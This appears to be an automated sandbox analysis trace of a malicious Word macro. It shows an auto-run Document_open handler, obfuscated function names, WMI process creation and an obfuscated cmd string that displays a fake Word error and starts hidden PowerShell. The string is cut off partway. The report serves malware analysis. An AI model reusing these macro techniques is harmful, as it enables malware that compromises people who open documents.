Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: OIbfvEEFF
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: eLmLDU
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FYVZFEH
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hoyzuBGCP
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lADFBaJ

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	G8xesq0b8jlsfrsp	executed
11	End Sub

Module: Owppnp8hah4xo788

Declaration

Line	Content
1	Attribute VB_Name = "Owppnp8hah4xo788"

Executed Functions

Function G8xesq0b8jlsfrsp, APIs: 624, Strings: 66, Number of lines: 195, Relevance: 1394.195

APIs	Meta Information
Zw1k7hcmdl66
Item
Hyii7r76oq89
diCXTi
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
NZiApKAp
Close
vrYYHIDxI
gzTFLxb
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
PjNhJNA
Close
oAaNlB
sySRJ
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
UwyYSBsBN
Close
tpOgXmm
MHYlQAD
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
GznGGHyG
Close
bbsIZ
Mid
Name
Application
swNGWdd
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
rJEkbLH
Close
vEBqHrDnD
tWcKo
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
LzxxRHG
Close
EKezHIC
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
DpYbmDA
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
hDJDJ
Close
dXiwA
CreateObject	CreateObject("winmgmts:win32_process")
hFSyAfFrF
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
hXxQDACJA
Close
xkQqDXCcD
Mid
Len	Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 